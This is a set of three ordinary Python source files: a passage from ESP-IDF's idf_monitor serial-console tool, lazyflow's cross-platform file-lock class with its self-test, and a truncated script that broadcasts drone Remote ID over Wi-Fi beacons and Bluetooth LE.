self._cancel()
old_thread.join()
class ConsoleReader(StoppableThread):
""" Read input keys from the console and push them to the queue,
until stopped.
"""
def __init__(self, console, event_queue, test_mode):
super(ConsoleReader, self).__init__()
self.console = console
self.event_queue = event_queue
self.test_mode = test_mode
def run(self):
self.console.setup()
try:
while self.alive:
try:
if os.name == 'nt':
# Windows kludge: because the console.cancel() method doesn't
# seem to work to unblock getkey() on the Windows implementation.
#
# So we only call getkey() if we know there's a key waiting for us.
import msvcrt
while not msvcrt.kbhit() and self.alive:
time.sleep(0.1)
if not self.alive:
break
elif self.test_mode:
# In testing mode the stdin is connected to PTY but is not used for input anything. For PTY
# the canceling by fcntl.ioctl isn't working and would hang in self.console.getkey().
# Therefore, we avoid calling it.
while self.alive:
time.sleep(0.1)
break
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if c is not None:
self.event_queue.put((TAG_KEY, c), False)
finally:
self.console.cleanup()
def _cancel(self):
if os.name == 'posix' and not self.test_mode:
# this is the way cancel() is implemented in pyserial 3.3 or newer,
# older pyserial (3.1+) has cancellation implemented via 'select',
# which does not work when console sends an escape sequence response
#
# even older pyserial (<3.1) does not have this method
#
# on Windows there is a different (also hacky) fix, applied above.
#
# note that TIOCSTI is not implemented in WSL / bash-on-Windows.
# TODO: introduce some workaround to make it work there.
#
# Note: This would throw exception in testing mode when the stdin is connected to PTY.
import fcntl
import termios
fcntl.ioctl(self.console.fd, termios.TIOCSTI, b'\0')
class SerialReader(StoppableThread):
""" Read serial data from the serial port and push to the
event queue, until stopped.
"""
def __init__(self, serial, event_queue):
super(SerialReader, self).__init__()
self.baud = serial.baudrate
self.serial = serial
self.event_queue = event_queue
if not hasattr(self.serial, 'cancel_read'):
# enable timeout for checking alive flag,
# if cancel_read not available
self.serial.timeout = 0.25
def run(self):
if not self.serial.is_open:
self.serial.baudrate = self.baud
self.serial.rts = True # Force an RTS reset on open
self.serial.open()
self.serial.rts = False
try:
while self.alive:
data = self.serial.read(self.serial.in_waiting or 1)
if len(data):
self.event_queue.put((TAG_SERIAL, data), False)
finally:
self.serial.close()
def _cancel(self):
if hasattr(self.serial, 'cancel_read'):
try:
self.serial.cancel_read()
except Exception:
pass
class LineMatcher(object):
"""
Assembles a dictionary of filtering rules based on the --print_filter
argument of idf_monitor. Then later it is used to match lines and
determine whether they should be shown on screen or not.
"""
LEVEL_N = 0
LEVEL_E = 1
LEVEL_W = 2
LEVEL_I = 3
LEVEL_D = 4
LEVEL_V = 5
level = {'N': LEVEL_N, 'E': LEVEL_E, 'W': LEVEL_W, 'I': LEVEL_I, 'D': LEVEL_D,
'V': LEVEL_V, '*': LEVEL_V, '': LEVEL_V}
def __init__(self, print_filter):
self._dict = dict()
self._re = re.compile(r'^(?:\033\[[01];?[0-9]+m?)?([EWIDV]) \([0-9]+\) ([^:]+): ')
items = print_filter.split()
if len(items) == 0:
self._dict["*"] = self.LEVEL_V # default is to print everything
for f in items:
s = f.split(r':')
if len(s) == 1:
# specifying no warning level defaults to verbose level
lev = self.LEVEL_V
elif len(s) == 2:
if len(s[0]) == 0:
raise ValueError('No tag specified in filter ' + f)
try:
lev = self.level[s[1].upper()]
except KeyError:
raise ValueError('Unknown warning level in filter ' + f)
else:
raise ValueError('Missing ":" in filter ' + f)
self._dict[s[0]] = lev
def match(self, line):
try:
m = self._re.search(line)
if m:
lev = self.level[m.group(1)]
if m.group(2) in self._dict:
return self._dict[m.group(2)] >= lev
return self._dict.get("*", self.LEVEL_N) >= lev
except (KeyError, IndexError):
# Regular line written with something else than ESP_LOG*
# or an empty line.
pass
# We need something more than "*.N" for printing.
return self._dict.get("*", self.LEVEL_N) > self.LEVEL_N
class SerialStopException(Exception):
"""
This exception is used for stopping the IDF monitor in testing mode.
"""
pass
class Monitor(object):
"""
Monitor application main class.
This was originally derived from miniterm.Miniterm, but it turned out to be easier to write from scratch for this
purpose.
Main difference is that all event processing happens in the main thread, not the worker threads.
"""
def __init__(self, serial_instance, elf_file, print_filter, make="make", toolchain_prefix=DEFAULT_TOOLCHAIN_PREFIX, eol="CRLF"):
super(Monitor, self).__init__()
self.event_queue = queue.Queue()
self.console = miniterm.Console()
if os.name == 'nt':
sys.stderr = ANSIColorConverter(sys.stderr, decode_output=True)
self.console.output = ANSIColorConverter(self.console.output)
self.console.byte_output = ANSIColorConverter(self.console.byte_output)
if StrictVersion(serial.VERSION) < StrictVersion('3.3.0'):
# Use Console.getkey implementation from 3.3.0 (to be in sync with the ConsoleReader._cancel patch above)
def getkey_patched(self):
c = self.enc_stdin.read(1)
if c == chr(0x7f):
c = chr(8) # map the BS key (which yields DEL) to backspace
return c
self.console.getkey = types.MethodType(getkey_patched, self.console)
socket_mode = serial_instance.port.startswith("socket://") # testing hook - data from serial can make exit the monitor
self.serial = serial_instance
self.console_reader = ConsoleReader(self.console, self.event_queue, socket_mode)
self.serial_reader = SerialReader(self.serial, self.event_queue)
self.elf_file = elf_file
if not os.path.exists(make):
self.make = shlex.split(make) # allow for possibility the "make" arg is a list of arguments (for idf.py)
else:
self.make = make
self.toolchain_prefix = toolchain_prefix
self.menu_key = CTRL_T
self.exit_key = CTRL_RBRACKET
self.translate_eol = {
"CRLF": lambda c: c.replace("\n", "\r\n"),
"CR": lambda c: c.replace("\n", "\r"),
"LF": lambda c: c.replace("\r", "\n"),
}[eol]
# internal state
self._pressed_menu_key = False
self._last_line_part = b""
self._gdb_buffer = b""
self._pc_address_buffer = b""
self._line_matcher = LineMatcher(print_filter)
self._invoke_processing_last_line_timer = None
self._force_line_print = False
self._output_enabled = True
self._serial_check_exit = socket_mode
self._log_file = None
def invoke_processing_last_line(self):
self.event_queue.put((TAG_SERIAL_FLUSH, b''), False)
def main_loop(self):
self.console_reader.start()
self.serial_reader.start()
try:
while self.console_reader.alive and self.serial_reader.alive:
(event_tag, data) = self.event_queue.get()
if event_tag == TAG_KEY:
self.handle_key(data)
elif event_tag == TAG_SERIAL:
self.handle_serial_input(data)
if self._invoke_processing_last_line_timer is not None:
self._invoke_processing_last_line_timer.cancel()
self._invoke_processing_last_line_timer = threading.Timer(0.1, self.invoke_processing_last_line)
self._invoke_processing_last_line_timer.start()
# If no futher data is received in the next short period
# of time then the _invoke_processing_last_line_timer
# generates an event which will result in the finishing of
# the last line. This is fix for handling lines sent
# without EOL.
elif event_tag == TAG_SERIAL_FLUSH:
self.handle_serial_input(data, finalize_line=True)
else:
raise RuntimeError("Bad event data %r" % ((event_tag,data),))
except SerialStopException:
sys.stderr.write(ANSI_NORMAL + "Stopping condition has been received\n")
finally:
try:
self.console_reader.stop()
self.serial_reader.stop()
self.stop_logging()
# Cancelling _invoke_processing_last_line_timer is not
# important here because receiving empty data doesn't matter.
self._invoke_processing_last_line_timer = None
except Exception:
pass
sys.stderr.write(ANSI_NORMAL + "\n")
def handle_key(self, key):
if self._pressed_menu_key:
self.handle_menu_key(key)
self._pressed_menu_key = False
elif key == self.menu_key:
self._pressed_menu_key = True
elif key == self.exit_key:
self.console_reader.stop()
self.serial_reader.stop()
else:
try:
key = self.translate_eol(key)
self.serial.write(codecs.encode(key))
except serial.SerialException:
pass # this shouldn't happen, but sometimes port has closed in serial thread
except UnicodeEncodeError:
pass # this can happen if a non-ascii character was passed, ignoring
def handle_serial_input(self, data, finalize_line=False):
sp = data.split(b'\n')
if self._last_line_part != b"":
# add unprocessed part from previous "data" to the first line
sp[0] = self._last_line_part + sp[0]
self._last_line_part = b""
if sp[-1] != b"":
# last part is not a full line
self._last_line_part = sp.pop()
for line in sp:
if line != b"":
if self._serial_check_exit and line == self.exit_key.encode('latin-1'):
raise SerialStopException()
if self._force_line_print or self._line_matcher.match(line.decode(errors="ignore")):
self._print(line + b'\n')
self.handle_possible_pc_address_in_line(line)
self.check_gdbstub_trigger(line)
self._force_line_print = False
# Now we have the last part (incomplete line) in _last_line_part. By
# default we don't touch it and just wait for the arrival of the rest
# of the line. But after some time when we didn't received it we need
# to make a decision.
if self._last_line_part != b"":
if self._force_line_print or (finalize_line and self._line_matcher.match(self._last_line_part.decode(errors="ignore"))):
self._force_line_print = True
self._print(self._last_line_part)
self.handle_possible_pc_address_in_line(self._last_line_part)
self.check_gdbstub_trigger(self._last_line_part)
# It is possible that the incomplete line cuts in half the PC
# address. A small buffer is kept and will be used the next time
# handle_possible_pc_address_in_line is invoked to avoid this problem.
# MATCH_PCADDR matches 10 character long addresses. Therefore, we
# keep the last 9 characters.
self._pc_address_buffer = self._last_line_part[-9:]
# GDB sequence can be cut in half also. GDB sequence is 7
# characters long, therefore, we save the last 6 characters.
self._gdb_buffer = self._last_line_part[-6:]
self._last_line_part = b""
# else: keeping _last_line_part and it will be processed the next time
# handle_serial_input is invoked
def handle_possible_pc_address_in_line(self, line):
line = self._pc_address_buffer + line
self._pc_address_buffer = b""
for m in re.finditer(MATCH_PCADDR, line.decode(errors="ignore")):
self.lookup_pc_address(m.group())
def handle_menu_key(self, c):
if c == self.exit_key or c == self.menu_key: # send verbatim
self.serial.write(codecs.encode(c))
elif c in [CTRL_H, 'h', 'H', '?']:
red_print(self.get_help_text())
elif c == CTRL_R: # Reset device via RTS
self.serial.setRTS(True)
time.sleep(0.2)
self.serial.setRTS(False)
self.output_enable(True)
elif c == CTRL_F: # Recompile & upload
self.run_make("flash")
elif c == CTRL_A: # Recompile & upload app only
self.run_make("app-flash")
elif c == CTRL_Y: # Toggle output display
self.output_toggle()
elif c == CTRL_L: # Toggle saving output into file
self.toggle_logging()
elif c == CTRL_P:
yellow_print("Pause app (enter bootloader mode), press Ctrl-T Ctrl-R to restart")
# to fast trigger pause without press menu key
self.serial.setDTR(False) # IO0=HIGH
self.serial.setRTS(True) # EN=LOW, chip in reset
time.sleep(1.3) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.1
self.serial.setDTR(True) # IO0=LOW
self.serial.setRTS(False) # EN=HIGH, chip out of reset
time.sleep(0.45) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.05
self.serial.setDTR(False) # IO0=HIGH, done
else:
red_print('--- unknown menu character {} --'.format(key_description(c)))
def get_help_text(self):
return """
--- idf_monitor ({version}) - ESP-IDF monitor tool
--- based on miniterm from pySerial
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {reset:7} Reset target board via RTS line
--- {makecmd:7} Build & flash project
--- {appmake:7} Build & flash app only
--- {output:7} Toggle output display
--- {log:7} Toggle saving output into file
--- {pause:7} Reset target into bootloader to pause app via RTS line
""".format(version=__version__,
exit=key_description(self.exit_key),
menu=key_description(self.menu_key),
reset=key_description(CTRL_R),
makecmd=key_description(CTRL_F),
appmake=key_description(CTRL_A),
output=key_description(CTRL_Y),
log=key_description(CTRL_L),
pause=key_description(CTRL_P))
def __enter__(self):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.serial_reader.stop()
self.console_reader.stop()
def __exit__(self, *args, **kwargs):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.console_reader.start()
self.serial_reader.start()
def prompt_next_action(self, reason):
self.console.setup() # set up console to trap input characters
try:
red_print("""
--- {}
--- Press {} to exit monitor.
--- Press {} to build & flash project.
--- Press {} to build & flash app.
--- Press any other key to resume monitor (resets target).""".format(reason,
key_description(self.exit_key),
key_description(CTRL_F),
key_description(CTRL_A)))
k = CTRL_T # ignore CTRL-T here, so people can muscle-memory Ctrl-T Ctrl-F, etc.
while k == CTRL_T:
k = self.console.getkey()
finally:
self.console.cleanup()
if k == self.exit_key:
self.event_queue.put((TAG_KEY, k))
elif k in [CTRL_F, CTRL_A]:
self.event_queue.put((TAG_KEY, self.menu_key))
self.event_queue.put((TAG_KEY, k))
def run_make(self, target):
with self:
if isinstance(self.make, list):
popen_args = self.make + [target]
else:
popen_args = [self.make, target]
yellow_print("Running %s..." % " ".join(popen_args))
p = subprocess.Popen(popen_args)
try:
p.wait()
except KeyboardInterrupt:
p.wait()
if p.returncode != 0:
self.prompt_next_action("Build failed")
else:
self.output_enable(True)
def lookup_pc_address(self, pc_addr):
cmd = ["%saddr2line" % self.toolchain_prefix,
"-pfiaC", "-e", self.elf_file, pc_addr]
try:
translation = subprocess.check_output(cmd, cwd=".")
if b"?? ??:0" not in translation:
self._print(translation.decode(), console_printer=yellow_print)
except OSError as e:
red_print("%s: %s" % (" ".join(cmd), e))
def check_gdbstub_trigger(self, line):
line = self._gdb_buffer + line
self._gdb_buffer = b""
m = re.search(b"\\$(T..)#(..)", line) # look for a gdb "reason" for a break
if m is not None:
try:
chsum = sum(ord(bytes([p])) for p in m.group(1)) & 0xFF
calc_chsum = int(m.group(2), 16)
except ValueError:
return # payload wasn't valid hex digits
if chsum == calc_chsum:
self.run_gdb()
else:
red_print("Malformed gdb message... calculated checksum %02x received %02x" % (chsum, calc_chsum))
def run_gdb(self):
with self: # disable console control
sys.stderr.write(ANSI_NORMAL)
try:
cmd = ["%sgdb" % self.toolchain_prefix,
"-ex", "set serial baud %d" % self.serial.baudrate,
"-ex", "target remote %s" % self.serial.port,
"-ex", "interrupt", # monitor has already parsed the first 'reason' command, need a second
self.elf_file]
process = subprocess.Popen(cmd, cwd=".")
process.wait()
except OSError as e:
red_print("%s: %s" % (" ".join(cmd), e))
except KeyboardInterrupt:
pass # happens on Windows, maybe other OSes
finally:
try:
# on Linux, maybe other OSes, gdb sometimes seems to be alive even after wait() returns...
process.terminate()
except Exception:
pass
try:
# also on Linux, maybe other OSes, gdb sometimes exits uncleanly and breaks the tty mode
subprocess.call(["stty", "sane"])
except Exception:
pass # don't care if there's no stty, we tried...
self.prompt_next_action("gdb exited")
def output_enable(self, enable):
self._output_enabled = enable
def output_toggle(self):
self._output_enabled = not self._output_enabled
yellow_print("\nToggle output display: {}, Type Ctrl-T Ctrl-Y to show/disable output again.".format(self._output_enabled))
def toggle_logging(self):
if self._log_file:
self.stop_logging()
else:
self.start_logging()
def start_logging(self):
if not self._log_file:
try:
name = "log.{}.{}.txt".format(os.path.splitext(os.path.basename(self.elf_file))[0],
datetime.datetime.now().strftime('%Y%m%d%H%M%S'))
self._log_file = open(name, "wb+")
yellow_print("\nLogging is enabled into file {}".format(name))
except Exception as e:
red_print("\nLog file {} cannot be created: {}".format(name, e))
def stop_logging(self):
if self._log_file:
try:
name = self._log_file.name
self._log_file.close()
yellow_print("\nLogging is disabled and file {} has been closed".format(name))
except Exception as e:
red_print("\nLog file cannot be closed: {}".format(e))
finally:
self._log_file = None
def _print(self, string, console_printer=None):
if console_printer is None:
console_printer = self.console.write_bytes
if self._output_enabled:
console_printer(string)
if self._log_file:
try:
if isinstance(string, type(u'')):
string = string.encode()
self._log_file.write(string)
except Exception as e:
red_print("\nCannot write to file: {}".format(e))
# don't fill-up the screen with the previous errors (probably consequent prints would fail also)
self.stop_logging()
def main():
parser = argparse.ArgumentParser("idf_monitor - a serial output monitor for esp-idf")
parser.add_argument(
'--port', '-p',
help='Serial port device',
default=os.environ.get('ESPTOOL_PORT', '/dev/ttyUSB0')
)
parser.add_argument(
'--baud', '-b',
help='Serial port baud rate',
type=int,
default=os.environ.get('MONITOR_BAUD', 115200))
parser.add_argument(
'--make', '-m',
help='Command to run make',
type=str, default='make')
parser.add_argument(
'--toolchain-prefix',
help="Triplet prefix to add before cross-toolchain names",
default=DEFAULT_TOOLCHAIN_PREFIX)
parser.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="End of line to use when sending to the serial port",
default='CR')
parser.add_argument(
'elf_file', help='ELF file of application',
type=argparse.FileType('rb'))
parser.add_argument(
'--print_filter',
help="Filtering string",
default=DEFAULT_PRINT_FILTER)
args = parser.parse_args()
if args.port.startswith("/dev/tty."):
args.port = args.port.replace("/dev/tty.", "/dev/cu.")
yellow_print("--- WARNING: Serial ports accessed as /dev/tty.* will hang gdb if launched.")
yellow_print("--- Using %s instead..." % args.port)
serial_instance = serial.serial_for_url(args.port, args.baud,
do_not_open=True)
serial_instance.dtr = False
serial_instance.rts = False
args.elf_file.close() # don't need this as a file
# remove the parallel jobserver arguments from MAKEFLAGS, as any
# parent make is only running 1 job (monitor), so we can re-spawn
# all of the child makes we need (the -j argument remains part of
# MAKEFLAGS)
try:
makeflags = os.environ["MAKEFLAGS"]
makeflags = re.sub(r"--jobserver[^ =]*=[0-9,]+ ?", "", makeflags)
os.environ["MAKEFLAGS"] = makeflags
except KeyError:
pass # not running a make jobserver
monitor = Monitor(serial_instance, args.elf_file.name, args.print_filter, args.make, args.toolchain_prefix, args.eol)
yellow_print('--- idf_monitor on {p.name} {p.baudrate} ---'.format(
p=serial_instance))
yellow_print('--- Quit: {} | Menu: {} | Help: {} followed by {} ---'.format(
key_description(monitor.exit_key),
key_description(monitor.menu_key),
key_description(monitor.menu_key),
key_description(CTRL_H)))
if args.print_filter != DEFAULT_PRINT_FILTER:
yellow_print('--- Print filter: {} ---'.format(args.print_filter))
monitor.main_loop()
if os.name == 'nt':
# Windows console stuff
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
# wincon.h values
FOREGROUND_INTENSITY = 8
FOREGROUND_GREY = 7
# matches the ANSI color change sequences that IDF sends
RE_ANSI_COLOR = re.compile(b'\033\\[([01]);3([0-7])m')
# list mapping the 8 ANSI colors (the indexes) to Windows Console colors
ANSI_TO_WINDOWS_COLOR = [0, 4, 2, 6, 1, 5, 3, 7]
GetStdHandle = ctypes.windll.kernel32.GetStdHandle
SetConsoleTextAttribute = ctypes.windll.kernel32.SetConsoleTextAttribute
class ANSIColorConverter(object):
"""Class to wrap a file-like output stream, intercept ANSI color codes,
and convert them into calls to Windows SetConsoleTextAttribute.
Doesn't support all ANSI terminal code escape sequences, only the sequences IDF uses.
Ironically, in Windows this console output is normally wrapped by winpty which will then detect the console text
color changes and convert these back to ANSI color codes for MSYS' terminal to display. However this is the
least-bad working solution, as winpty doesn't support any "passthrough" mode for raw output.
"""
def __init__(self, output=None, decode_output=False):
self.output = output
self.decode_output = decode_output
self.handle = GetStdHandle(STD_ERROR_HANDLE if self.output == sys.stderr else STD_OUTPUT_HANDLE)
self.matched = b''
def _output_write(self, data):
try:
if self.decode_output:
self.output.write(data.decode())
else:
self.output.write(data)
except IOError:
# Windows 10 bug since the Fall Creators Update, sometimes writing to console randomly throws
# an exception (however, the character is still written to the screen)
# Ref https://github.com/espressif/esp-idf/issues/1136
pass
def write(self, data):
if isinstance(data, bytes):
data = bytearray(data)
else:
data = bytearray(data, 'utf-8')
for b in data:
b = bytes([b])
length = len(self.matched)
if b == b'\033': # ESC
self.matched = b
elif (length == 1 and b == b'[') or (1 < length < 7):
self.matched += b
if self.matched == ANSI_NORMAL.encode('latin-1'): # reset console
# Flush is required only with Python3 - switching color before it is printed would mess up the console
self.flush()
SetConsoleTextAttribute(self.handle, FOREGROUND_GREY)
self.matched = b''
elif len(self.matched) == 7: # could be an ANSI sequence
m = re.match(RE_ANSI_COLOR, self.matched)
if m is not None:
color = ANSI_TO_WINDOWS_COLOR[int(m.group(2))]
if m.group(1) == b'1':
color |= FOREGROUND_INTENSITY
# Flush is required only with Python3 - switching color before it is printed would mess up the console
self.flush()
SetConsoleTextAttribute(self.handle, color)
else:
self._output_write(self.matched) # not an ANSI color code, display verbatim
self.matched = b''
else:
self._output_write(b)
self.matched = b''
def flush(self):
self.output.flush()
if __name__ == "__main__":
main()
|
filelock.py
|
###############################################################################
# lazyflow: data flow based lazy parallel computation framework
#
# Copyright (C) 2011-2014, the ilastik developers
# <team@ilastik.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the Lesser GNU General Public License
# as published by the Free Software Foundation; either version 2.1
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# See the files LICENSE.lgpl2 and LICENSE.lgpl3 for full text of the
# GNU Lesser General Public License version 2.1 and 3 respectively.
# This information is also available on the ilastik web site at:
# http://ilastik.org/license/
###############################################################################
"""
Implementation of a simple cross-platform file locking mechanism.
This is a modified version of code retrieved on 2013-01-01 from
http://www.evanfosmark.com/2009/01/cross-platform-file-locking-support-in-python.
(The original code was released under the BSD License. See below for details.)
Modifications in this version:
- Tweak docstrings for sphinx.
- Accept an absolute path for the protected file (instead of a file name relative to cwd).
- Allow timeout to be None.
- Fixed a bug that caused the original code to be NON-threadsafe when the same FileLock instance was shared by multiple threads in one process.
(The original was safe for multiple processes, but not multiple threads in a single process. This version is safe for both cases.)
- Added ``purge()`` function.
- Added ``available()`` function.
- Expanded API to mimic ``threading.Lock interface``:
- ``__enter__`` always calls ``acquire()``, and therefore blocks if ``acquire()`` was called previously.
- ``__exit__`` always calls ``release()``. It is therefore a bug to call ``release()`` from within a context manager.
- Added ``locked()`` function.
- Added blocking parameter to ``acquire()`` method
WARNINGS:
- The locking mechanism used here may need to be changed to support old NFS filesystems:
http://lwn.net/Articles/251004
(Newer versions of NFS should be okay, e.g. NFSv3 with Linux kernel 2.6. Check the open(2) man page for details about O_EXCL.)
- This code has not been thoroughly tested on Windows, and there has been one report of incorrect results on Windows XP and Windows 7.
The locking mechanism used in this class should (in theory) be cross-platform, but use at your own risk.
ORIGINAL LICENSE:
The original code did not properly include license text.
(It merely said "License: BSD".)
Therefore, we'll attach the following generic BSD License terms to this file.
Those who extract this file from the lazyflow code base (LGPL) for their own use
are therefore bound by the terms of both the Simplified BSD License below AND the LGPL.
Copyright (c) 2013, Evan Fosmark and others.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The views and conclusions contained in the software and documentation are those
of the authors and should not be interpreted as representing official policies,
either expressed or implied, of the FreeBSD Project.
"""
from __future__ import print_function
from builtins import range
from builtins import object
import os
import sys
import time
import errno
class FileLock(object):
""" A file locking mechanism that has context-manager support so
you can use it in a ``with`` statement. This should be relatively cross
compatible as it doesn't rely on ``msvcrt`` or ``fcntl`` for the locking.
"""
class FileLockException(Exception):
pass
def __init__(self, protected_file_path, timeout=None, delay=1, lock_file_contents=None):
""" Prepare the file locker. Specify the file to lock and optionally
the maximum timeout and the delay between each attempt to lock.
"""
self.is_locked = False
self.lockfile = protected_file_path + ".lock"
self.timeout = timeout
self.delay = delay
self._lock_file_contents = lock_file_contents
if self._lock_file_contents is None:
self._lock_file_contents = "Owning process args:\n"
for arg in sys.argv:
self._lock_file_contents += arg + "\n"
def locked(self):
"""
Returns True iff the file is owned by THIS FileLock instance.
(Even if this returns false, the file could be owned by another FileLock instance, possibly in a different thread or process).
"""
return self.is_locked
def available(self):
"""
Returns True iff the file is currently available to be locked.
"""
return not os.path.exists(self.lockfile)
def acquire(self, blocking=True):
""" Acquire the lock, if possible. If the lock is in use, and `blocking` is False, return False.
Otherwise, check again every `self.delay` seconds until it either gets the lock or
exceeds `timeout` number of seconds, in which case it raises an exception.
"""
start_time = time.time()
while True:
try:
# Attempt to create the lockfile.
# These flags cause os.open to raise an OSError if the file already exists.
fd = os.open(self.lockfile, os.O_CREAT | os.O_EXCL | os.O_RDWR)
with os.fdopen(fd, "a") as f:
# Print some info about the current process as debug info for anyone who bothers to look.
f.write(self._lock_file_contents)
break
except OSError as e:
if e.errno != errno.EEXIST:
raise
if self.timeout is not None and (time.time() - start_time) >= self.timeout:
raise FileLock.FileLockException("Timeout occurred. You may need to purge the `.lock` file manually"
" using the option `--purge` with `manager.py`. Removing the .lock"
"may break ongoing transactions.")
if not blocking:
return False
time.sleep(self.delay)
self.is_locked = True
return True
def release(self):
""" Get rid of the lock by deleting the lockfile.
When working in a `with` statement, this gets automatically
called at the end.
"""
self.is_locked = False
os.unlink(self.lockfile)
def __enter__(self):
""" Activated when used in the with statement.
Should automatically acquire a lock to be used in the with block.
"""
self.acquire()
return self
def __exit__(self, type, value, traceback):
""" Activated at the end of the with statement.
It automatically releases the lock if it isn't locked.
"""
self.release()
def __del__(self):
""" Make sure this ``FileLock`` instance doesn't leave a .lock file
lying around.
"""
if self.is_locked:
self.release()
def purge(self):
"""
For debug purposes only. Removes the lock file from the hard disk.
"""
if os.path.exists(self.lockfile):
self.release()
return True
return False
if __name__ == "__main__":
import sys
import functools
import threading
import tempfile
temp_dir = tempfile.mkdtemp()
protected_filepath = os.path.join(temp_dir, "somefile.txt")
print("Protecting file: {}".format(protected_filepath))
fl = FileLock(protected_filepath)
def writeLines(line, repeat=10):
with fl:
for _ in range(repeat):
with open(protected_filepath, "a") as f:
f.write(line + "\n")
f.flush()
th1 = threading.Thread(target=functools.partial(writeLines, "1111111111111111111111111111111"))
th2 = threading.Thread(target=functools.partial(writeLines, "2222222222222222222222222222222"))
th3 = threading.Thread(target=functools.partial(writeLines, "3333333333333333333333333333333"))
th4 = threading.Thread(target=functools.partial(writeLines, "4444444444444444444444444444444"))
th1.start()
th2.start()
th3.start()
th4.start()
th1.join()
th2.join()
th3.join()
th4.join()
assert not os.path.exists(fl.lockfile), "The lock file wasn't cleaned up!"
# Print the contents of the file.
# Please manually inspect the output. Does it look like the operations were atomic?
with open(protected_filepath, "r") as f:
sys.stdout.write(f.read())
|
remote_droneID.py
|
import subprocess
from time import sleep
from threading import Thread
import yaml
class DRI:
# ROS node to convert to hex format
# <element id><len><oui><vendor ie>
# standards-oui.ieee.org/oui/oui.txt
# QC OUI: 88-12-4E or 00-A0-C6 or 64-9c-81 ...
# BRCM OUI: BC-97-E1 or 00-1B-E9 or 00-05-B5 ...
#
def __init__(self):
self.bt_if = ""
self.dri_if = ""
self.obs_if = ""
print('> Loading yaml conf... ')
self._conf = yaml.safe_load(open("dri.conf", 'r'))
self.debug = self._conf['debug']
self.dri_update_int = self._conf['dri_ie_update_interval']
self.dri_data_file = self._conf['dri_file_name']
self.tx_mode = self._conf['mode']
self.dri_role = self._conf['dri_role']
@staticmethod
def prepare_vendor_ie(drone_id):
length = len(drone_id)
# Add custom OUI
oui = "bbddcc"
# 3 byte for OUI
length = length / 2 + 3
len_tag = format(int(length), '#04x')[2:]
vendor_ie = "dd" + len_tag + oui + drone_id
return vendor_ie
@staticmethod
def update_vendor_ie(drone_id):
cmds = ["hostapd_cli SET vendor_elements " + str(drone_id),
"hostapd_cli DISABLE",
"hostapd_cli ENABLE"]
for cmd in cmds:
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
@staticmethod
def prepare_ble_dri_uuid(drone_id):
return ' '.join([drone_id[i:i + 2] for i in range(0, len(drone_id), 2)])
@staticmethod
def ble_dri_tx(self, drone_id):
# allow rfkill to bring up bluetooth hci interface
cmd = "rfkill unblock bluetooth"
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
# bring up bluetooth interface.
# To do: use bluez python lib
cmd = "hciconfig " + str(self.bt_if) + " up"
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
# enable ble advertising, To do: dynamically detect connection vs connectionless adv
cmd = "hciconfig " + str(self.bt_if) + " leadv 3"
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
sd = self.prepare_ble_dri_uuid(drone_id)
# To do: generate dynamic UUID and remove hardcoded tx power(get from conf)
cmd = "hcitool -i " + str(self.bt_if) + " cmd 0x08 0x0008 1E 02 01 1A 1A FF 4C 00 02 15 " +\
str(sd) + " 00 00 00 00 " + "C5 00"
print(cmd)
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
@staticmethod
def get_wifi_beacon_list(self):
cmd = "iw wlan0 scan -u | grep 'SSID\|Vendor specific'"
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
dri_oui_list = proc.communicate()[0].decode('utf-8').strip()
if self.debug:
print(f"{dri_oui_list=}")
def dri_thread(self):
while True:
f = open(self.dri_data_file, 'r')
dri_data = f.read()
if self.debug:
print(f"{dri_data=}")
f.close()
if self.tx_mode == 'wifi':
beacon_vendor_ie = self.prepare_vendor_ie(dri_data)
if self.debug:
print(f"{beacon_vendor_ie=}")
self.update_vendor_ie(beacon_vendor_ie)
elif self.tx_mode == 'bt':
self.ble_dri_tx(dri_data)
sleep(self.dri_update_int)
def observer_thread(self):
while True:
if self.tx_mode == 'wifi':
self.get_wifi_beacon_list(self)
sleep(self.dri_update_int)
def run(self):
if self.dri_role == "uav":
if self.tx_mode == 'wifi':
self.dri_if = self._conf['dri_if']
elif self.tx_mode == 'bt':
